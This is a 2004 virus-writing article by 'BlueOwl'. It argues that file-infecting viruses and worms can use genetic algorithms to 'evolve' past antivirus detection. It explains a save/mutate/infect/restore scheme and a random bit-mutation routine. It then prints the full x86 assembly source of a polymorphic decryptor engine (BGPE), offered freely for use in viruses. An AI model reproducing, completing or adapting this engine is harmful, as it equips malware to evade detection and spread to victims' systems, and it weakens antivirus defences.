Implementing genetic algorithms in virusses [by BlueOwl]
Implementing genetic algorithms in virusses by BlueOwl
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Introduction
************
I have personally always been fascinated by evolution and am a strong
believer that it is the truth about how organisms evolve. I have also
spend many thoughts and codes and readings trying to figure out if it
could also be implemented in computer virusses, of course something
completely different.
Normally computer virusses either don't change them selves (static),
they encrypt themselves with one or multiple decryptors or they
completely change their body (hard to do). With the second and the
third way virusses try to completely change their layout / code use /
register use etc.This theory will try to prove that another way could
be better.
!Note! In this theory I mainly describe how a fileinfecting virus
could use genetics. This can however be applied to any spreading
program including worms, as long as you can be creative.
Darwinian evolution - theory
****************************
Ok, so in short. What is Darwinian evolution? Let assume we have one
species, let us say dogs. And lets assume that they are put in the
jungle without humans around. You probably know there are lots of
different dogs. Small, thin, big with long/small tales large/small
beaks etc. etc. So all these different ones are dumped into the jungle.
Some would die because they could not find something to eat. Some
because they were caught and eaten by lions. Some would fall and
drown in rivers. Etc. But as you could imagine: From all those tens
of thousands of dogs a few would still probably survive, because
they were best adapted to the jungle. These remaining dogs would then
mate and produce offspring. Some of these new dogs would be better
adjusted to the environment, some worse. So some of this new generation
would die but a lot of them would not, because they resembled their
dog parents which *could* survive.
With Darwinian evolution it is all about this. The strongest survive,
and the offspring of these strongest will survive event better or
worse. Ultimately creating the "perfect" species.
So in short
***********
Okay, so reading from the text above there are x core factors:
- Each individual has a certain DNA which depends what it is, small
thin, with long hair/short hair etc.
- The environment kills individuals with certain characteristics,
for example some dogs have long legs to run fast with so they
can outrun lions, the ones with short legs are killed and eaten.
- Dogs which *do* survive because of their positive characteristics
will produce offspring which resembles them, thus they have
a lot of the same characteristics but with a small number of
changes. These changes will depend whether this individual
will do better or worse than its parents.
Binary organisms
****************
This theory said, lets talk about modern computer virusses and
evolution theory. What's the use of genetics in computer virusses?
In the virus world, of course, there are no "natural" enemies. No
lions, rivers, etc. etc. There is only one enemy: antivirusses.
When an antivirus finds a virus, it will be removed. Killed. To
detect virusses antivirusses have 2 ways: virus specific and
virus unspecific (heuristic).
The first method means a virus on the loose is 'caught'. Someone
who is infected by it and sends it over to antivirus offices for
analysing. It will get fully or partially analysed by antivirus
personnel and a detection routine for it is generated. This is
sent to all people owning the antivirus and thus they become
'immune' to the virus.
The second way for detecting virusses in general is for the
antivirus to check for virus-like signs and suspicious things.
What kind of things are suspicious and what things are not have
been decided by the software authors. Some virusses will not get
detected though, because they don't match the 'description'. The
programmer cannot add an unlimited number of 'recognisers' because
the more he adds the higher the chance will be a non-virus will
fit the description.
Binary and biologic: the connection
***********************************
First let us talk about unspecific detection. With this detection
virusses are detected on what they do. The antivirus can detect
them on the changes they make to files they infect. But as I
said before: Some virusses *do not* get detected. This is of
course because each virus can have its own way of doing it.
If we would compare this with a dog with long or short legs, we
get a remarkably good comparison. If a dog has short legs he dies,
and with long legs he survives. If a virus has one way of infecting
it gets detected, if it uses another it does not.
So what way is best for the virus to use? That's unknown. Just like
a dog with short or long legs does not *know* if it will survive,
a virus won't either. For the dog species in total it is not a
problem. Some dogs will die but new dogs will take their places.
For a virus species it *is* a problem. Simply because there are
no different kinds of one virus. Even if the virus is polymorphic
(self changing), it will still be a problem because a polymorphic
virus survivor has no way of 'knowing' what combination worked.
So it would be like a long-legged parent getting both long-legged
and short-legged offspring.
Here comes the idea of genetics and DNA for virusses to mind.
What if the virus could 'remember' what kind of infection it did
and pass it on with some slight modifications to its children.
If it did that it could truly evolute like the dogs would.
The same goes for specific detection. Let us say the antivirus
researcher analyses the virus and finds a kind of infection. It
is added to the virus database and all virusses using that kind
will be detected and removed. Virusses using another one because
of other DNA won't be removed and will take the place of the
previous virus sample. That way virus evolution is complete: as
long as not *ALL* virus samples have been added to the detection
database, some will escape detection, live on and breed.
Genetic algorithms
******************
Genetic algorithms can be considered reasonably simple with
a few things maybe harder to understand (and code). The structure
of the, in my opinion, best genetic engine would be (explained
later):
For each file to infect:
1) Save virus DNA
2) Mutate virus DNA
3) Infect file
4) Restore virus DNA
Firstly let us talk about the infection of the file. In this
routine every possible genetic step (*) is made in the way of:
> if (stepxgene==0){ do first way } else { do second way }
To make the process more efficient it is the easiest to give all
steps a fixed number of possibilities, Fe. all four possibilities.
This will help in determining the way you are going to -store-
the DNA. If you are thinking about multiple DNA steps per byte
I would encourage you to use a number in the range of 2^... so
you can use the maximum number of bits available.
The save/mutate/restore may be a little bit harder to understand
why it is done. The ultimate reason is the fact that this way the
file will be infect according to DNA of the virus's OFFSPRING.
That way the offspring 'knows' *exactly* what it consists of. If
the virus would only give its copy a mutated DNA under infection
evolution would stay behind a little. Fe. A virus has DNA A
and infects a file in way A but gives its copy DNA B. Also a
problem is the fact that all files infected by one virus will be
infected in exactly the same way. And you don't see all the puppies
of a dog look the same.
Selecting appropriate genes
***************************
What to make genetic and what not is another topic to think about
and it is debatable. The real question is whether or not something
is useful to be genetic. Fe. human hair colour is genetic, but
fingerprints are even with one-egg twins different. Finger prints
were in through the evolution of man clearly of no importance. You
can add anything which you like to make genetic, but a problem
comes up when you have something like:
if(gene==0){ ...
if (anothergene==0){ ... } else { ... }
...
} else {
...
if (yetanothergene==0){ ... } else { ... }
...
}
Of course it is possible, but when you look at it more closely
you will notice that the importance of a gene declines, f.e.:
if (...){ if (...){ if (...){ ... } ..}..}
If the first "if" gene will mutate all the inner genes won't
get executed anymore, and a much bigger adaptation is made than
when an inner gene is changed. So to be 'fair' you would have to
make the chance of mutation smaller on more important genes. It
is a problem which you can live with but I would recommend trying
to avoid it and keeping it in this format:
if (...) { ... }
...
if (...) { ... }
...
if (...) { ... }
...
...
Furthermore, do not get carried away when creating genes. I mean
do not create a self destruct gene. ;) And make sure all options
are compatible! The best way to test for this is to put all genes
first to zero, than to one etc. to the end number of different
options. You can't test all combination individually anyway.
Mutations
*********
Mutations are the essence of evolution. Without it, of course,
everything would stay the same. So the engine should make a change
sometimes. However this is another thing to think about: How often
should something be changed? If too much is changed virusses could
be completely different to soon and the effect of evolution lost.
But if it changed too slow it could be not variable enough to
escape detection and come up with new ways. Anyway, it is debatable.
Furthermore, the number of possible mutations shouldn't also be
static. So to stick to nature, every gene should independently have
a certain chance of changing. My algorithm is (ASM):
call rand ; eax = random
xchg eax, edx ; (each bit has a chance of 1 in 2 to be 1)
call rand ; eax = random
and edx, eax ; chance 1 in 4
call rand
and edx, eax ; chance 1 in 8
call rand
and edx, eax ; chance 1 in 16
call rand
and edx, eax ; chance 1 in 32
So in this example, at the end, every bit in edx has a chance of
one in thirty-two to be 1; while all others are zero. Thus because
a dword consists out of 32 bits, the average should be one bit
1 each time at the end of this proc. However 0, 2, 3, 4 ... 32 bits
1 are also possibilities, but the chance 32 bits are 1 is a number of
one in 48 digits. So we are save to assume too big mutations will
almost never happen.
So after getting this value we simply xor it with the dna (given
the fact it only consists out of one dword). Giving a small number or
no mutations.
xor [dna], edx
Code example
************
To give and example of how this *could* be implement I have coded this
simple polymorphic engine. Actually it is not *that* simple and may
be hard to understand, since I optimized most things about it. It has
2 parts which contain genetics. A DNA variable (called DNA), and a
register container. These are firstly saved at the start of the engine
and then the originals are altered. Then it generates a decryptor
according to these.
The decryptor is then generated in the following way: All parts of the
decryptor have four possible options (see the part under
<call load_table>). So from the DNA each time 2 bits (can be 0,1,2,3)
are read and used to pick the correct genetically specified option. If
you check this out maybe you will learn some new techniques, but don't
try to understand it too much :) (blame my coding style ;)).
Final Word
**********
First of all, I hope you have enjoyed reading my article. As i am very
interested in the subject myself, i liked to write something about this.
I have already read other people thinking and writing about this subject,
and i like it. I also hope this will enspire you to do new things with
your codings, even completely different. This is not *necessarily* the
best idea.
BlueOwl november 2004
; ¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤
; BGPE - BlueOwls Genetic Poly Engine (Simple version)
; Al though this is just a "simple" version, feel free to spread and
; use it in whatever you like, as long as you don't hold me responsible
; AND don't claim it is yours. :) What i was thinking about adding was
; placing all the code blocks in random order, maybe something for a
; next version ;).
; Good luck with it.
; BlueOwl
; BTW. Sorry for not commenting this much, but personally
; in: eax = rnd
; ecx = size of virus in bytes rounded to a dword ((virus_size+3)/4)*4
; esi = start of virus
; edi = start of outputbuffer
;
; out: eax = size of generated
ptr_low equ 0 shl 3 + 6
ptr_high equ 1 shl 3 + 6
ctr_low equ 2 shl 3 + 6
ctr_high equ 3 shl 3 + 6
tmp_low equ 4 shl 3 + 6
ptrtmp equ 5 shl 3 + 6
ptrptr equ 6 shl 3 + 6
ctrctr equ 7 shl 3 + 6
cjmp equ 8 shl 3 + 6
mlbl equ 9 shl 3 + 6
edword equ 10 shl 3 + 6
ebyte equ 11 shl 3 + 6
size_dword equ 12 shl 3 + 6
tmptmp equ 13 shl 3 + 6
ecd equ 14 shl 3 + 6
estart equ ebp-4*1
rna equ ebp-4*2
vsized equ ebp-4*3
lbler equ ebp-4*4
_edword equ ebp+7*4
_ebyte equ ebp-4*5
BGPE: pushad
call inner_delta
inner_delta: pop ebp
push dword [ebp+bgpe_dna-inner_delta] ; save old dna
push dword [ebp+lregsstart-inner_delta] ; save old registeruse
push dword [ebp+lregsstart+4-inner_delta] ; " "
push ebp
push ecx
lea ecx, [ebp+lregsstart-inner_delta]
lea ebx, [ebp+bgpe_dna-inner_delta]
mov ebp, esp
add ebp, 4
call bgpe_rand
xchg edx, eax
call bgpe_rand
and edx, eax
call bgpe_rand
and edx, eax
call bgpe_rand
and edx, eax ; chance 1 in 16 for each bit
xor [ebx], edx
push 7
pop edx
xchg ecx, edx
mutate_regs: call bgpe_rand
test eax, 0111b ; chance of 3 bits being 0 in 8
jnz no_mut
mov al, byte [edx] ; swap around register
mov byte [edx+1], al
no_mut: inc edx
loop mutate_regs
pop ecx
mov al, 0e8h
stosb
mov eax, ecx
stosd
push edi
shr ecx, 2
db 068h
bgpe_dna dd 0 ; 01010101010101010101010101010101b
push ecx
push eax
rep movsd
call bgpe_rand
push eax
call load_table
getptr: gp1 db gp2-gp1,ptr_low,58h,ptr_low,50h ; pop reg / push reg
gp2 db gp3-gp2,08bh,ptr_high,04h,024h ; mov reg, [esp]
gp3 db gp4-gp3,0ffh,034h,024h,ptr_low,058h ; push [esp] / pop reg
gp4 db gp5-gp4,00bh,ptr_high,04h,024h,023h,ptr_high,04h,024h ; or reg, [esp] / and reg, [esp]
gp5:
initcnt: ic1 db ic2-ic1,ctr_low,0b8h,size_dword ; mov reg, value
ic2 db ic3-ic2,068h,size_dword,ctr_low,058h ; push value / pop reg
ic3 db ic4-ic3,083h,ctr_low,0e0h,000h,081h,ctr_low,0c0h,size_dword ; and reg, 0 / add reg, value
ic4 db ic5-ic4,08dh,ctr_high,005h,size_dword ; lea reg, [value]
ic5:
getdword: gd1 db gd2-gd1,mlbl,087h,ptrtmp,0 ; xchg reg, [reg]
gd2 db gd3-gd2,mlbl,0ffh,ptr_low,030h,tmp_low,058h ; push [reg] / pop reg
gd3 db gd4-gd3,mlbl,08bh,ptrtmp,0 ; mov reg, [reg]
gd4 db gd5-gd4,mlbl,00bh,ptrtmp,000h,023h,ptrtmp,000h ; or reg, [reg] / and reg, [reg]
gd5:
decryptdword: cy1 db cy2-cy1,08dh,tmptmp,080h,edword,0c1h,tmp_low,0c0h,ebyte,ecd ; lea reg, [reg+value] / rol reg, value
push ecx
movzx ecx, byte [_ebyte]
ror eax, cl
pop ecx
sub eax, [_edword]
ret
cy2 db cy3-cy2,0c1h,tmp_low,0c8h,ebyte,0f7h,tmp_low,0d8h,ecd ; ror reg, value / neg reg
neg eax
push ecx
movzx ecx, byte [_ebyte]
rol eax, cl
pop ecx
ret
cy3 db cy4-cy3,0fh,tmp_low,0c8h,081h,tmp_low,0f0h,edword,ecd ; bswap reg / xor reg, value
xor eax, [_edword]
bswap eax
ret
cy4 db cy5-cy4,081h,tmp_low,0e8h,edword,0f7h,tmp_low,0d0h,ecd ; sub reg, value / not reg
not eax
add eax, [_edword]
ret
cy5:
putdword: pd1 db pd2-pd1,087h,ptrtmp,0 ; xchg [reg], reg
pd2 db pd3-pd2,tmp_low,050h,08fh,ptr_low,000h ; push reg / pop [reg]
pd3 db pd4-pd3,089h,ptrtmp,0 ; mov [reg], reg
pd4 db pd5-pd4,021h,ptrtmp,000h,009h,ptrtmp,000h ; and [reg], reg / or [reg], reg
pd5:
addptr: ap1 db ap2-ap1,08dh,ptrptr,040h,004h ; lea reg, [reg+4]
ap2 db ap3-ap2,083h,ptr_low,0c0h,004h ; add reg, 4
ap3 db ap4-ap3,083h,ptr_low,0e8h,0fch ; sub reg, -4
ap4 db ap5-ap4,ptr_low,040h,ptr_low,040h,ptr_low,040h,ptr_low,040h ; 4* inc reg
ap5:
decctr: dc1 db dc2-dc1,ctr_low,048h ; dec reg
dc2 db dc3-dc2,083h,ctr_low,0e8h,001h ; sub reg, 1
dc3 db dc4-dc3,083h,ctr_low,0c0h,0ffh ; add reg, -1
dc4 db dc5-dc4,08dh,ctrctr,040h,0ffh ; lea reg, [reg-1]
dc5:
conjmp: cj1 db cj2-cj1,009h,ctrctr,0c0h,074h,002h,0ebh,cjmp ; or reg, reg / jz $+4 / jmp label
cj2 db cj3-cj2,ctr_low,040h,ctr_low,048h,075h,cjmp ; inc reg / dec reg / jnz label
cj3 db cj4-cj3,083h,ctr_low,0f8h,001h,073h,cjmp ; cmp reg, 1 / jnb label
cj4 db cj5-cj4,ctr_low,048h,078h,003h,ctr_low,040h,079h,cjmp ; dec reg / js $+3 / inc reg / jns label
cj5:
doret: rt1 db rt2-rt1,0c3h ; ret
rt2 db rt3-rt2,0c2h,000h,000h ; ret 0
rt3 db rt4-rt3,058h,0ffh,0e0h ; pop eax / jmp eax
rt4 db rt5-rt4,0ffh,034h,024h,0c2h,004h,00h ; push [esp] / ret 4
rt5:
db 0
load_table: pop edx
call load_regs
lregsstart db 00h,01h,02h,03h,05h,06h,07h
load_regs: pop ebx
do_decryptor: cmp byte [edx], 0
jz decryptor_done
mov esi, edx
push 4
pop ecx
_reloadnext: movzx eax, byte [edx]
add edx, eax
loop _reloadnext
mov ecx, [rna]
shr dword [rna], 2 ; move up rna
and ecx, 011b ; put ecx in range 0-3
or ecx, ecx
jz this_found
_loadthis: movzx eax, byte [esi]
add esi, eax
loop _loadthis
this_found: movzx ecx, byte [esi]
dec ecx
inc esi
process_table: lodsb
push eax
and eax, 07h
cmp eax, 06
pop eax
jz special_command
or al, ah
stosb
sub ah, ah
resume_process: loop process_table
jmp do_decryptor
special_command:movzx eax, al ; process special command
do_command: shr eax, 3 ; (make label/add register/etc.)
push edx
call getsptrs
sptrs: db do_ptr_low-sptrs,do_ptr_high-sptrs,do_ctr_low-sptrs,do_ctr_high-sptrs
db do_tmp_low-sptrs,do_ptrtmp-sptrs,do_ptrptr-sptrs,do_ctrctr-sptrs
db do_docjmp-sptrs,do_mlbl-sptrs,do_edword-sptrs,do_ebyte-sptrs
db do_size_dword-sptrs,do_tmptmp-sptrs,do_ecd-sptrs
getsptrs: pop edx
mov al, byte [edx+eax] ; select the appropiate handler
add edx, eax
sub eax, eax
call edx
pop edx
jmp resume_process ; from here on different handlers
do_ecd: push edx edi
xchg esi, edx
mov ecx, [vsized]
mov esi, [estart]
mov edi, esi
_encrypt: lodsd
call edx
stosd
loop _encrypt
push 1
pop ecx
pop edi edx
ret
do_ptr_high: mov ah, [ebx+0] ; fix registers
shl ah, 3 ; ...
ret
do_ctr_high: mov ah, [ebx+1]
shl ah, 3
ret
do_tmptmp: mov ah, [ebx+2]
shl ah, 3
do_tmp_low: or ah, [ebx+2]
ret
do_ptrtmp: mov ah, [ebx+2]
shl ah, 3
jmp do_ptr_low
do_ptrptr: mov ah, [ebx+0]
shl ah, 3
do_ptr_low: or ah, [ebx+0]
ret
do_ctrctr: call do_ctr_high
do_ctr_low: or ah, [ebx+1]
ret
do_docjmp: mov eax, [lbler] ; calculate jump difference
sub eax, edi
dec eax
stosb
ret
do_mlbl: mov [lbler], edi
ret
do_edword: mov eax, [_edword]
jmp store_zero
do_size_dword: mov eax, [vsized]
store_zero: stosd
sub eax, eax
ret
do_ebyte: mov al, [_ebyte]
stosb
ret
decryptor_done: mov esp, ebp
pop ebp
pop dword [ebp+lregsstart+4-inner_delta] ; restore old stuff
pop dword [ebp+lregsstart-inner_delta] ;
pop dword [ebp+bgpe_dna-inner_delta] ;
mov [esp+4*7], edi
popad
sub eax, edi
ret
bgpe_rand: mov eax, [ebp+7*4]
rol eax, 7
neg ax
add eax, 0B78F23A5h ; just a number
xor [ebp+7*4], eax ; save for later
ret
; ¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤
; Copyright BlueOwl 2004
; Have a nice time. EOF.